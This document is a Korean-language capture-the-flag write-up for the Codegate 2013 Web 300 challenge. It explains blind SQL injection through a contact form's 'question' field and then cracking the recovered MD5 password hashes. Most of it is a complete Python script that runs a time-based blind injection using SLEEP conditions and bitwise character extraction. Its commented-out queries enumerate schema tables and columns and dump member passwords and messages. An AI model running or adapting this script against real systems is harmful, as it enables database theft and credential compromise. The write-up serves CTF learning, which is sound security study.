[Codegate 2013] Web 300 simple write up

전형적인 블라인드 인젝션 문제다.

contact를 하는 부분(이름,메일,question,메세지 보내는 부분)에서 인젝션이 가능하다.

question 파라메터를 이용해서 블라인드 인젝션을 했다.

그러면 멤버들의 비밀번호가 md5로 해쉬 되어있는걸 확인할수 있고

사전식으로 online md5 decoding 페이지들을 이용해서 디코딩이 가능하다.

그리고 소스보기를 통해 보면, 자바스크립트가 숨겨져있고, 숨겨진 로그인페이지가 있다는걸 알수 있다

그리고 나서 하나씩 로그인해보면 Hound 해킹을 의뢰한 사람과 시간이 나타난다.

[python]

import httplib,urllib;
import sys
import time

# Blind SQL injection

# setting
#toget = 'database()';
#toget = "(SELECT password from `member` where id=0x666c617368)" #flash
#toget = "(SELECT password from `member` where id=0x7a6f64696163)" #zodiac
#toget = "(SELECT password from `member` where id=0x6c656f70617264)" #leopard
toget = "(SELECT password from `member` where id=0x766963746f72)" #victor
#toget = "(SELECT min(`id`) from `member` where id > 0x766963746f72)"
#toget = "(SELECT group_concat(message) FROM contact)"
#toget = "(SELECT column_name FROM information_schema.columns WHERE table_name=0x6d656d626572 and table_schema=0x7468655f67726579  LIMIT "+sys.argv[1]+",1)"
#toget = "(SELECT table_name FROM information_schema.tables WHERE table_schema=0x7468655f67726579 LIMIT "+sys.argv[1]+",1)"
stage = 2
ck = 'PHPSESSID=equncg53svlebb0ic8u9oouc34';
referer = 'http://58.229.122.17:2218/contact.php'

print "[*] Stage1: Find Length of " + toget

answer = ""
length=0
i = 0
j = 1
k = 1
m = 1
while j <= stage:
        if j is 1:
                query = "if(length("+toget+")= "+str(k)+",SLEEP(2),1)"
        else:
                query = "if(substr(LPAD(bin(ascii(substr("+toget+","+str(k)+",1))),8,0),"+str(m)+",1)=0x31,SLEEP(2),1) "
        val = urllib.urlencode({'question': query,'your_name':'a','your_email':'a@a.com','your_message':'a','contact_submitted':'send'})
        headers = { 'Accept':'text/html, application/xhtml+xml, */*', 'Content-type': 'application/x-www-form-urlencoded', 'Content-length': str(len(val)), 'Cookie': ck, 'Referer': referer, 'Accept-Language':'ko-KR','User-Agent':'User-Agent: Mozilla/5.0 (compatible; MSIE 10.6; hello; Trident/6.0)'}
        conn = httplib.HTTPConnection("58.229.122.17",2218)
        t1 = time.time()
        conn.connect()
        conn.request('POST','/contact.php',val,headers)
        response = conn.getresponse()
        data = response.read()
        conn.close()
        t2 = time.time()
        if j is 1:
                print "now: "+str(k)
                if (t2-t1) > 2:
                        length = k
                        print "[+] Length: " + str(length)
                        print "[*] Stage 2"
                        k = 1
                        j = 2 # go to stage 2
                        continue
                k = k+1
        else:
                if (t2-t1) > 2:
                        i += pow(2,8-m)
                        print str(m)+" "+str(i)
                if m is 8:
                        answer = answer+chr(i)
                        print "Find: " + answer
                        k = k+1
                        i=0
                        m=1
                        if k > length:
                                break
                m = m+1

print "Answer:" +answer